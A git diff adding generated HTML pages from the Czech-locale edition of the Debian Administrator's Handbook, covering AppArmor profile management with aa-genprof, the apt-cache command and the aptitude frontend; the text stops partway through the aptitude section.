+   /sbin/klogd
+[...]
+3 processes have profiles defined.
+1 processes are in enforce mode.
+   /usr/sbin/libvirtd (1295) 
+2 processes are in complain mode.
+   /usr/sbin/avahi-daemon (941) 
+   /usr/sbin/avahi-daemon (1000) 
+0 processes are unconfined but have a profile defined.</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> More AppArmor profiles</strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">apparmor-profiles</span> package contains profiles managed by the upstream AppArmor community. To get even more profiles you can install <span
+                class="pkg pkg">apparmor-profiles-extra</span> which contains profiles developed by Ubuntu and Debian.
+			</div></div><div
+            class="para">
+				The state of each profile can be switched between enforcing and complaining with calls to <code
+              class="command">aa-enforce</code> and <code
+              class="command">aa-complain</code> giving as parameter either the path of the executable or the path to the policy file. Additionaly a profile can be entirely disabled with <code
+              class="command">aa-disable</code> or put in audit mode (to log accepted system calls too) with <code
+              class="command">aa-audit</code>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-enforce /usr/sbin/avahi-daemon</code></strong>
+<code
+              class="computeroutput">Setting /usr/sbin/avahi-daemon to enforce mode.</code>
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-complain /etc/apparmor.d/usr.bin.lxc-start</code></strong>
+<code
+              class="computeroutput">Setting /etc/apparmor.d/usr.bin.lxc-start to complain mode.</code>
+</pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-new-profile"></a>14.4.3. Creating a new profile</h3></div></div></div><div
+            class="para">
+				Even though creating an AppArmor profile is rather easy, most programs do not have one. This section will show you how to create a new profile from scratch just by using the target program and letting AppArmor monitor the system call it makes and the resources it accesses.
+			</div><div
+            class="para">
+				The most important programs that need to be confined are the network facing programs as those are the most likely targets of remote attackers. That is why AppArmor conveniently provides an <code
+              class="command">aa-unconfined</code> command to list the programs which have no associated profile and which expose an open network socket. With the <code
+              class="literal">--paranoid</code> option you get all unconfined processes that have at least one active network connection.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-unconfined</code></strong>
+<code
+              class="computeroutput">801 /sbin/dhclient not confined
+890 /sbin/rpcbind not confined
+899 /sbin/rpc.statd not confined
+929 /usr/sbin/sshd not confined
+941 /usr/sbin/avahi-daemon confined by '/usr/sbin/avahi-daemon (complain)'
+988 /usr/sbin/minissdpd not confined
+1276 /usr/sbin/exim4 not confined
+1485 /usr/lib/erlang/erts-6.2/bin/epmd not confined
+1751 /usr/lib/erlang/erts-6.2/bin/beam.smp not confined
+19592 /usr/lib/dleyna-renderer/dleyna-renderer-service not confined</code>
+</pre><div
+            class="para">
+				In the following example, we will thus try to create a profile for <code
+              class="command">/sbin/dhclient</code>. For this we will use <code
+              class="command">aa-genprof dhclient</code>. It will invite you to use the application in another window and when done to come back to <code
+              class="command">aa-genprof</code> to scan for AppArmor events in the system logs and convert those logs into access rules. For each logged event, it will make one or more rule suggestions that you can either approve or further edit in multiple ways:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-genprof dhclient</code></strong>
+<code
+              class="computeroutput">Writing updated profile for /sbin/dhclient.
+Setting /sbin/dhclient to complain mode.
+
+Before you begin, you may wish to check if a
+profile already exists for the application you
+wish to confine. See the following wiki page for
+more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Please start the application to be profiled in
+another window and exercise its functionality now.
+
+Once completed, select the "Scan" option below in 
+order to scan the system logs for AppArmor events. 
+
+For each AppArmor event, you will be given the 
+opportunity to choose whether the access should be 
+allowed or denied.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+Reading log entries from /var/log/audit/audit.log.
+
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-execute"><img
+                  class="callout"
+                  src="Common_Content/images/1.png"
+                  alt="1" /></span>
+Execute:  /usr/lib/NetworkManager/nm-dhcp-helper
+Severity: unknown
+
+(I)nherit / (C)hild / (P)rofile / (N)amed / (U)nconfined / (X) ix On / (D)eny / Abo(r)t / (F)inish
+<strong
+                class="userinput"><code>P</code></strong>
+Should AppArmor sanitise the environment when
+switching profiles?
+
+Sanitising environment is more secure,
+but some applications depend on the presence
+of LD_PRELOAD or LD_LIBRARY_PATH.
+
+(Y)es / [(N)o]
+<strong
+                class="userinput"><code>Y</code></strong>
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+Complain-mode changes:
+WARN: unknown capability: CAP_net_raw
+
+Profile:    /sbin/dhclient <span
+                id="aa-genprof-capability"><img
+                  class="callout"
+                  src="Common_Content/images/2.png"
+                  alt="2" /></span>
+Capability: net_raw
+Severity:   unknown
+
+[(A)llow] / (D)eny / (I)gnore / Audi(t) / Abo(r)t / (F)inish
+<strong
+                class="userinput"><code>A</code></strong>
+Adding capability net_raw to profile.
+
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-read"><img
+                  class="callout"
+                  src="Common_Content/images/3.png"
+                  alt="3" /></span>
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+  3 - #include &lt;abstractions/nameservice&gt; 
+  4 - #include &lt;abstractions/totem&gt; 
+ [5 - /etc/nsswitch.conf]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>3</code></strong>
+
+Profile:  /sbin/dhclient
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+ [3 - #include &lt;abstractions/nameservice&gt;]
+  4 - #include &lt;abstractions/totem&gt; 
+  5 - /etc/nsswitch.conf 
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding #include &lt;abstractions/nameservice&gt; to profile.
+
+Profile:  /sbin/dhclient
+Path:     /proc/7252/net/dev
+Mode:     r
+Severity: 6
+
+  1 - /proc/7252/net/dev 
+ [2 - /proc/*/net/dev]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /proc/*/net/dev r to profile
+
+[...]
+Profile:  /sbin/dhclient <span
+                id="aa-genprof-write"><img
+                  class="callout"
+                  src="Common_Content/images/4.png"
+                  alt="4" /></span>
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+ [1 - /run/dhclient-eth0.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>N</code></strong>
+
+Enter new path: /run/dhclient*.pid
+
+Profile:  /sbin/dhclient
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+  1 - /run/dhclient-eth0.pid 
+ [2 - /run/dhclient*.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /run/dhclient*.pid w to profile
+
+[...]
+Profile:  /usr/lib/NetworkManager/nm-dhcp-helper <span
+                id="aa-genprof-other-profile"><img
+                  class="callout"
+                  src="Common_Content/images/5.png"
+                  alt="5" /></span>
+Path:     /proc/filesystems
+Mode:     r
+Severity: 6
+
+ [1 - /proc/filesystems]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<strong
+                class="userinput"><code>A</code></strong>
+Adding /proc/filesystems r to profile
+
+= Changed Local Profiles =
+
+The following local profiles were changed. Would you like to save them?
+
+ [1 - /sbin/dhclient]
+  2 - /usr/lib/NetworkManager/nm-dhcp-helper 
+(S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes b/w (C)lean profiles / Abo(r)t
+<strong
+                class="userinput"><code>S</code></strong>
+Writing updated profile for /sbin/dhclient.
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+<strong
+                class="userinput"><code>F</code></strong>
+Setting /sbin/dhclient to enforce mode.
+Setting /usr/lib/NetworkManager/nm-dhcp-helper to enforce mode.
+
+Reloaded AppArmor profiles in enforce mode.
+
+Please consider contributing your new profile!
+See the following wiki page for more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Finished generating profile for /sbin/dhclient.</code></pre><div
+            class="para">
+				Note that the program does not display back the control characters that you type but for the clarity of the explanation I have included them in the previous transcript.
+			</div><div
+            class="calloutlist"><table
+              border="0"
+              summary="Callout list"><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-execute"><img
+                        class="callout"
+                        src="Common_Content/images/1.png"
+                        alt="1" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						The first event detected is the execution of another program. In that case, you have multiple choices: you can run the program with the profile of the parent process (the “Inherit” choice), you can run it with its own dedicated profile (the “Profile” and the “Named” choices, differing only by the possibility to use an arbitrary profile name), you can run it with a sub-profile of the parent process (the “Child” choice), you can run it without any profile (the “Unconfined” choice) or you can decide to not run it at all (the “Deny” choice).
+					</div><div
+                    class="para">
+						Note that when you opt to run it under a dedicated profile that doesn't exist yet, the tool will create the missing profile for you and will make rule suggestions for that profile in the same run.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-capability"><img
+                        class="callout"
+                        src="Common_Content/images/2.png"
+                        alt="2" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						At the kernel level, the special powers of the root user have been split in “capabilities”. When a system call requires a specific capability, AppArmor will verify whether the profile allows the program to make use of this capability.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-read"><img
+                        class="callout"
+                        src="Common_Content/images/3.png"
+                        alt="3" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						Here the program seeks read permissions for <code
+                      class="filename">/etc/nsswitch.conf</code>. <code
+                      class="command">aa-genprof</code> detected that this permission was also granted by multiple “abstractions” and offers them as alternative choices. An abstraction provides a reusable set of access rules grouping together multiple resources that are commonly used together. In this specific case, the file is generally accessed through the nameservice related functions of the C library and we type “3” to first select the “#include &lt;abstractions/nameservice&gt;” choice and then “A” to allow it.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-write"><img
+                        class="callout"
+                        src="Common_Content/images/4.png"
+                        alt="4" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						The program wants to create the <code
+                      class="filename">/run/dhclient-eth0.pid</code> file. If we allow the creation of this specific file only, the program will not work when the user will use it on another network interface. Thus we select “New” to replace the filename with the more generic “/run/dhclient*.pid” before recording the rule with “Allow”.
+					</div></td></tr><tr><td
+                  width="5%"
+                  valign="top"
+                  align="left"><p><a
+                      href="#aa-genprof-other-profile"><img
+                        class="callout"
+                        src="Common_Content/images/5.png"
+                        alt="5" /></a> </p></td><td
+                  valign="top"
+                  align="left"><div
+                    class="para">
+						Notice that this access request is not part of the dhclient profile but of the new profile that we created when we allowed <code
+                      class="filename">/usr/lib/NetworkManager/nm-dhcp-helper</code> to run with its own profile.
+					</div><div
+                    class="para">
+						After having gone through all the logged events, the program offers to save all the profiles that were created during the run. In this case, we have two profiles that we save at once with “Save” (but you can save them individually too) before leaving the program with “Finish”.
+					</div></td></tr></table></div><div
+            class="para">
+				<code
+              class="command">aa-genprof</code> is in fact only a smart wrapper around <code
+              class="command">aa-logprof</code>: it creates an empty profile, loads it in complain mode and then run <code
+              class="command">aa-logprof</code> which is a tool to update a profile based on the profile violations that have been logged. So you can re-run that tool later to improve the profile that you just created.
+			</div><div
+            class="para">
+				If you want the generated profile to be complete, you should use the program in all the ways that it is legitimately used. In the case of dhclient, it means running it via Network Manager, running it via ifupdown, running it manually, etc. In the end, you might get a <code
+              class="filename">/etc/apparmor.d/sbin.dhclient</code> close to this:
+			</div><pre
+            class="programlisting">
+# Last Modified: Tue Sep  8 21:40:02 2015
+#include &lt;tunables/global&gt;
+
+/sbin/dhclient {
+  #include &lt;abstractions/base&gt;
+  #include &lt;abstractions/nameservice&gt;
+
+  capability net_bind_service,
+  capability net_raw,
+
+  /bin/dash r,
+  /etc/dhcp/* r,
+  /etc/dhcp/dhclient-enter-hooks.d/* r,
+  /etc/dhcp/dhclient-exit-hooks.d/* r,
+  /etc/resolv.conf.* w,
+  /etc/samba/dhcp.conf.* w,
+  /proc/*/net/dev r,
+  /proc/filesystems r,
+  /run/dhclient*.pid w,
+  /sbin/dhclient mr,
+  /sbin/dhclient-script rCx,
+  /usr/lib/NetworkManager/nm-dhcp-helper Px,
+  /var/lib/NetworkManager/* r,
+  /var/lib/NetworkManager/*.lease rw,
+  /var/lib/dhcp/*.leases rw,
+
+  profile /sbin/dhclient-script flags=(complain) {
+    #include &lt;abstractions/base&gt;
+    #include &lt;abstractions/bash&gt;
+
+    /bin/dash rix,
+    /etc/dhcp/dhclient-enter-hooks.d/* r,
+    /etc/dhcp/dhclient-exit-hooks.d/* r,
+    /sbin/dhclient-script r,
+
+  }
+}
+</pre></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.supervision.html"><strong>Předcházející</strong>14.3. Supervision: Prevention, Detection, Deterre...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selinux.html"><strong>Další</strong>14.5. Introduction to SELinux</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.apt-cache.html b/tmp/cs-CZ/html/sect.apt-cache.html
new file mode 100644
index 000000000..0771997fe
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.apt-cache.html
@@ -0,0 +1,187 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.3. The apt-cache Command</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-get.html"
+        title="6.2. aptitude, apt-get, and apt Commands" /><link
+        rel="next"
+        href="sect.apt-frontends.html"
+        title="6.4. Frontends: aptitude, synaptic" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-cache.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-get.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-frontends.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-cache"></a>6.3. The <code
+                  class="command">apt-cache</code> Command</h2></div></div></div><a
+          id="id-1.9.12.2"
+          class="indexterm"></a><a
+          id="id-1.9.12.3"
+          class="indexterm"></a><a
+          id="id-1.9.12.4"
+          class="indexterm"></a><a
+          id="id-1.9.12.5"
+          class="indexterm"></a><a
+          id="id-1.9.12.6"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">apt-cache</code> command can display much of the information stored in APT's internal database. This information is a sort of cache since it is gathered from the different sources listed in the <code
+            class="filename">sources.list</code> file. This happens during the <code
+            class="command">apt update</code> operation.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.cache"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Cache</strong></p></div></div></div><div
+            class="para">
+			A cache is a temporary storage system used to speed up frequent data access when the usual access method is expensive (performance-wise). This concept can be applied in numerous situations and at different scales, from the core of microprocessors up to high-end storage systems.
+		</div><div
+            class="para">
+			In the case of APT, the reference <code
+              class="filename">Packages</code> files are those located on Debian mirrors. That said, it would be very ineffective to go through the network for every search that we might want to do in the database of available packages. That is why APT stores a copy of those files (in <code
+              class="filename">/var/lib/apt/lists/</code>) and searches are done within those local files. Similarly, <code
+              class="filename">/var/cache/apt/archives/</code> contains a cache of already downloaded packages to avoid downloading them again if you need to reinstall them after a removal.
+		</div></div><a
+          id="id-1.9.12.9"
+          class="indexterm"></a><a
+          id="id-1.9.12.10"
+          class="indexterm"></a><a
+          id="id-1.9.12.11"
+          class="indexterm"></a><a
+          id="id-1.9.12.12"
+          class="indexterm"></a><a
+          id="id-1.9.12.13"
+          class="indexterm"></a><a
+          id="id-1.9.12.14"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">apt-cache</code> command can do keyword-based package searches with <code
+            class="command">apt-cache search <em
+              class="replaceable">keyword</em></code>. It can also display the headers of the package's available versions with <code
+            class="command">apt-cache show <em
+              class="replaceable">package</em></code>. This command provides the package's description, its dependencies, the name of its maintainer, etc. Note that <code
+            class="command">apt search</code>, <code
+            class="command">apt show</code>, <code
+            class="command">aptitude search</code>, <code
+            class="command">aptitude show</code> work in the same way.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <code
+                      class="command">axi-cache</code></strong></p></div></div></div><a
+            id="id-1.9.12.16.2"
+            class="indexterm"></a><a
+            id="id-1.9.12.16.3"
+            class="indexterm"></a><div
+            class="para">
+			<code
+              class="command">apt-cache search</code> is a very rudimentary tool, basically implementing <code
+              class="command">grep</code> on package's descriptions. It often returns too many results or none at all when you include too many keywords.
+		</div><div
+            class="para">
+			<code
+              class="command">axi-cache search <em
+                class="replaceable">term</em></code>, on the other hand, provides better results, sorted by relevancy. It uses the <span
+              class="emphasis"><em>Xapian</em></span> search engine and is part of the <span
+              class="pkg pkg">apt-xapian-index</span> package whichs indexes all package information (and more, like the <code
+              class="filename">.desktop</code> files from all Debian packages). It knows about tags (see sidebar <a
+              class="xref"
+              href="sect.package-meta-information.html#sidebar.debtags"><span
+                class="emphasis"><em>GOING FURTHER</em></span> The <code
+                class="literal">Tag</code> field</a>) and returns results in a matter of milliseconds.
+		</div><pre
+            class="screen">$ <strong
+              class="userinput"><code>axi-cache search package use::searching</code></strong>
+100 results found.
+Results 1-20:
+100% packagesearch - GUI for searching packages and viewing package information
+100% apt-utils - package management related utility programs
+99% dpkg-awk - Gawk script to parse /var/lib/dpkg/{status,available} and Packages
+98% migemo - Transitional package for migemo
+95% apt-file - search for files within Debian packages (command-line interface)
+[...]
+79% apt-xapian-index - maintenance and search tools for a Xapian index of Debian packages
+More terms: paquets debian pour debtags recherche gift gnuift
+More tags: suite::debian works-with::software:package role::program admin::package-management interface::commandline scope::utility field::biology:bioinformatics
+`axi-cache more' will give more results
+</pre></div><a
+          id="id-1.9.12.17"
+          class="indexterm"></a><a
+          id="id-1.9.12.18"
+          class="indexterm"></a><a
+          id="id-1.9.12.19"
+          class="indexterm"></a><div
+          class="para">
+			Some features are more rarely used. For instance, <code
+            class="command">apt-cache policy</code> displays the priorities of package sources as well as those of individual packages. Another example is <code
+            class="command">apt-cache dumpavail</code> which displays the headers of all available versions of all packages. <code
+            class="command">apt-cache pkgnames</code> displays the list of all the packages which appear at least once in the cache.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-get.html"><strong>Předcházející</strong>6.2. aptitude, apt-get, and apt Commands</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-frontends.html"><strong>Další</strong>6.4. Frontends: aptitude, synaptic</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.apt-frontends.html b/tmp/cs-CZ/html/sect.apt-frontends.html
new file mode 100644
index 000000000..4c3143c40
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.apt-frontends.html
@@ -0,0 +1,268 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.4. Frontends: aptitude, synaptic</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.apt-cache.html"
+        title="6.3. The apt-cache Command" /><link
+        rel="next"
+        href="sect.package-authentication.html"
+        title="6.5. Checking Package Authenticity" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-frontends.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-cache.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-authentication.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-frontends"></a>6.4. Frontends: <code
+                  class="command">aptitude</code>, <code
+                  class="command">synaptic</code></h2></div></div></div><a
+          id="id-1.9.13.2"
+          class="indexterm"></a><a
+          id="id-1.9.13.3"
+          class="indexterm"></a><a
+          id="id-1.9.13.4"
+          class="indexterm"></a><div
+          class="para">
+			APT is a C++ program whose code mainly resides in the <code
+            class="command">libapt-pkg</code> shared library. Using a shared library facilitates the creation of user interfaces (front-ends), since the code contained in the library can easily be reused. Historically, <code
+            class="command">apt-get</code> was only designed as a test front-end for <code
+            class="command">libapt-pkg</code> but its success tends to obscure this fact.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.aptitude"></a>6.4.1. <code
+                    class="command">aptitude</code></h3></div></div></div><div
+            class="para">
+				<code
+              class="command">aptitude</code> is an interactive program that can be used in semi-graphical mode on the console. You can browse the list of installed and available packages, look up all the available information, and select packages to install or remove. The program is designed specifically to be used by administrators, so that its default behaviors are much more intelligent than <code
+              class="command">apt-get</code>'s, and its interface much easier to understand.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.9.13.6.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/aptitude.png"
+                  alt="The aptitude package manager" /></div></div><p
+              class="title"><strong>Obrázek 6.1. The <code
+                  class="command">aptitude</code> package manager</strong></p></div><div
+            class="para">
+				When it starts, <code
+              class="command">aptitude</code> shows a list of packages sorted by state (installed, non-installed, or installed but not available on the mirrors — other sections display tasks, virtual packages, and new packages that appeared recently on mirrors). To facilitate thematic browsing, other views are available. In all cases, <code
+              class="command">aptitude</code> displays a list combining categories and packages on the screen. Categories are organized through a tree structure, whose branches can respectively be unfolded or closed with the <span
+              class="keycap"><strong>Enter</strong></span>, <span
+              class="keycap"><strong>[</strong></span> and <span
+              class="keycap"><strong>]</strong></span> keys. <span
+              class="keycap"><strong>+</strong></span> should be used to mark a package for installation, <span
+              class="keycap"><strong>-</strong></span> to mark it for removal and <span
+              class="keycap"><strong>_</strong></span> to purge it (note that these keys can also be used for categories, in which case the corresponding actions will be applied to all the packages of the category). <span
+              class="keycap"><strong>u</strong></span> updates the lists of available packages and <span
+              class="keycap"><strong>Shift</strong></span>+<span
+              class="keycap"><strong>u</strong></span> prepares a global system upgrade. <span
+              class="keycap"><strong>g</strong></span> switches to a summary view of the requested changes (and typing <span
+              class="keycap"><strong>g</strong></span> again will apply the changes), and <span
+              class="keycap"><strong>q</strong></span> quits the current view. If you are in the initial view, this will effectively close <code
+              class="command">aptitude</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="command">aptitude</code></strong></p></div></div></div><div
+              class="para">
+				This section does not cover the finer details of using <code
+                class="command">aptitude</code>, it rather focuses on giving you a survival kit to use it. <code
+                class="command">aptitude</code> is rather well documented and we advise you to use its complete manual available in the <span
+                class="pkg pkg">aptitude-doc-en</span> package (see <code
+                class="filename">/usr/share/doc/aptitude/html/en/index.html</code>).
+			</div></div><div
+            class="para">
+				To search for a package, you can type <span
+              class="keycap"><strong>/</strong></span> followed by a search pattern. This pattern matches the name of the package, but can also be applied to the description (if preceded by <code
+              class="literal">~d</code>), to the section (with <code
+              class="literal">~s</code>) or to other characteristics detailed in the documentation. The same patterns can filter the list of displayed packages: type the <span
+              class="keycap"><strong>l</strong></span> key (as in <span
+              class="foreignphrase"><em
+                class="foreignphrase">limit</em></span>) and enter the pattern.
+			</div><div
+            class="para">
+				Managing the “automatic flag” of Debian packages (see <a
+              class="xref"
+              href="sect.apt-get.html#sect.automatic-tracking">6.2.7 – „Tracking Automatically Installed Packages“</a>) is a breeze with <code
+              class="command">aptitude</code>. It is possible to browse the list of installed packages and mark packages as automatic with <span
+              class="keycap"><strong>Shift</strong></span>+<span
+              class="keycap"><strong>m</strong></span> or to remove the mark with the <span
+              class="keycap"><strong>m</strong></span> key. “Automatic packages” are displayed with an “A” in the list of packages. This feature also offers a simple way to visualize the packages in use on a machine, without all the libraries and dependencies that you don't really care about. The related pattern that can be used with <span
+              class="keycap"><strong>l</strong></span> (to activate the filter mode) is <code
+              class="literal">~i!~M</code>. It specifies that you only want to see installed packages (<code
+              class="literal">~i</code>) not marked as automatic (<code
+              class="literal">!~M</code>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Using <code
+                        class="command">aptitude</code> on the command-line interface</strong></p></div></div></div><div
+              class="para">
+				Most of <code
+                class="command">aptitude</code>'s features are accessible via the interactive interface as well as via command-lines. These command-lines will seem familiar to regular users of <code
+                class="command">apt-get</code> and <code
+                class="command">apt-cache</code>.
+			</div><div
+              class="para">
+				The advanced features of <code
+                class="command">aptitude</code> are also available on the command-line. You can use the same package search patterns as in the interactive version. For example, if you want to cleanup the list of “manually installed” packages, and if you know that none of the locally installed programs require any particular libraries or Perl modules, you can mark the corresponding packages as automatic with a single command:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>aptitude markauto '~slibs|~sperl'</code></strong></pre><div
+              class="para">
+				Here, you can clearly see the power of the search pattern system of <code
+                class="command">aptitude</code>, which enables the instant selection of all the packages in the <code
+                class="literal">libs</code> and <code
+                class="literal">perl</code> sections.
